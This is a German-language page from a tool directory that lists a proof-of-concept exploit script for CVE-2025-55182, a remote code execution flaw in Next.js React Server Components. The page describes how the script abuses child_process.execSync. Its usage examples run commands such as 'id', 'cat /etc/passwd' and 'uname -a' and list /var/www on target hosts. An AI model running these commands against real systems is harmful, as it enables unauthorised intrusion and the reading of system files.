Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2025-55182 — POC-CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/devvaibhav07/poc-cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubdevvaibhav07/poc-cve-2025-55182

POC-CVE-2025-55182

POC-CVE-2025-55182

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Advanced Scanner

Ein voll ausgestattetes Exploitation-Tool für CVE-2025-55182 – Remote Code Execution über React Server Components in Next.js. Der Scanner erstellt automatisch den Multipart-Payload und missbraucht process.mainModule.require('child_process').execSync(), um auf verwundbaren Instanzen beliebige Betriebssystembefehle auszuführen.

Features

  • Automatischer Payload-Generator – keine manuelle Kodierung erforderlich
  • Befehlsausführung mit sauberer STDOUT-Extraktion
  • Automatische Protokollerkennung (https:// wird angewendet, falls fehlend)
  • Korrekte URL-Dekodierung + Wiederherstellung von Zeilenumbrüchen
  • Farbige, reichhaltige Ausgabe für schnelles Operator-Feedback
  • Fehler-Fingerprinting (500 / 403 / SSL / Timeout / WAF-Muster)

Installation

root@kitploit:~
chmod +x scanner.sh

Verwendung

root@kitploit:~
# Standard-Scan (führt 'id' aus)
./scanner.sh -d vulnerable-app.com

# Benutzerdefinierte Befehlsausführung
./scanner.sh -d vulnerable-app.com -c "whoami"

# Mit explizitem Protokoll
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

Optionen

Screenshot 2025-12-09 at 16 13 23

Beispiele

root@kitploit:~
# RCE verifizieren
./scanner.sh -d shop.example.com

# System-Fingerprinting
./scanner.sh -d shop.example.com -c "uname -a"

# Beschreibbare Pfade auflisten
./scanner.sh -d shop.example.com -c "ls -la /var/www"

# Pivot-Hilfe – ausgehenden Zugriff prüfen
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"

Kontaktieren Sie mich gerne unter mailto:[email protected]

Tool herunterladen